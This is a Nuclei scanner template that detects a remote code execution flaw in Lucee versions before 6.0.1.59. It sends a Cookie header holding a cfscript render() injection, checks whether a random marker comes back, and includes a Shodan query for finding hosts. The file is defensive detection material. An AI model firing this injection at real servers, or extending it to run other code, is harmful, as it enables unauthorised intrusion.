nuclei-templates/http/vulnerabilities/lucee-rce.yaml

30 lines
706 B
YAML
Raw Normal View History

2024-02-15 11:54:00 +00:00
id: lucee-rce
info:
name: Lucee < 6.0.1.59 - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
2024-02-15 12:20:25 +00:00
reference:
- https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
2024-02-15 11:54:00 +00:00
metadata:
max-request: 1
shodan-query: http.title:"Lucee"
verified: true
tags: lucee,rce,oast
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');
matchers:
- type: dsl
dsl:
- contains(body, "{{randstr}}")
- contains(header, "cfid")
- contains(header, "cftoken")
2024-02-15 12:20:25 +00:00
condition: and